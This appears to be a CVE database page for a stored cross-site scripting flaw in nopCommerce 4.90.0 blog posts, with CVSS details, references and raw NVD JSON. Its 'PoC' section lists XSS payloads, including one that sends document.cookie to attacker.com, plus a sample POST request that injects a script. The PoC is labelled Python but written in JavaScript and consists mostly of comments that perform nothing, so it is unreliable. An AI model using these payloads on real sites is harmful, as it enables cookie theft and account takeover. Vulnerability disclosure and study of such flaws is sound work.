CVE-2025-65590

Description

nopCommerce 4.90.0 is vulnerable to Cross Site Scripting (XSS) via the Blog posts functionality in the Content Management area.

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:nopcommerce:nopcommerce:4.90.0:*:*:*:*:*:*:* - VULNERABLE

nopCommerce 4.90.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-65590 PoC - nopCommerce 4.90.0 Blog XSS // This PoC demonstrates the stored XSS vulnerability in nopCommerce blog posts // Step 1: Authentication (low-privilege account required) const authPayload = { email: '[email protected]', password: 'password123' }; // Step 2: Create blog post with XSS payload const blogPostPayload = { title: 'Test Blog Post', body: '<script>console.log("XSS Triggered");</script>', // Alternative payloads: // '<img src=x onerror="fetch(\'http://attacker.com/steal?c=\'+document.cookie)">' // '<svg onload="alert(document.domain)">' // '<iframe src="javascript:alert(\'XSS\')">' tags: ['test'], displayOrder: 0, allowComments: false }; // Step 3: Send request to create blog post // POST /Admin/BlogPost/Create // Content-Type: application/x-www-form-urlencoded // When victims visit /blog/my-blog-post, the XSS will execute in their browser // Example HTTP request: /* POST /Admin/BlogPost/Create HTTP/1.1 Host: target.com Cookie: Nop.customer=xxx; Nop.admin=yyy Content-Type: application/x-www-form-urlencoded BlogPost.Title=<script>alert(document.cookie)</script>&BlogPost.Body=Test content&BlogPost.Tags=test */

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-65590
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-65590
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-65590/
[4] VulDB https://vuldb.com/cve/CVE-2025-65590
[5] https://seclists.org/fulldisclosure/2025/Dec/17
[6] https://www.nopcommerce.com/
[7] http://seclists.org/fulldisclosure/2025/Dec/17

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-65590", "sourceIdentifier": "[email protected]", "published": "2025-12-16T19:15:58.730", "lastModified": "2025-12-19T16:42:56.307", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "nopCommerce 4.90.0 is vulnerable to Cross Site Scripting (XSS) via the Blog posts functionality in the Content Management area."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nopcommerce:nopcommerce:4.90.0:*:*:*:*:*:*:*", "matchCriteriaId": "1FC64557-EDFD-4460-8793-8C452638D782"}]}]}], "references": [{"url": "https://seclists.org/fulldisclosure/2025/Dec/17", "source": "[email protected]", "tags": ["Mailing List", "Third Party Advisory"]}, {"url": "https://www.nopcommerce.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "http://seclists.org/fulldisclosure/2025/Dec/17", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory"]}]}}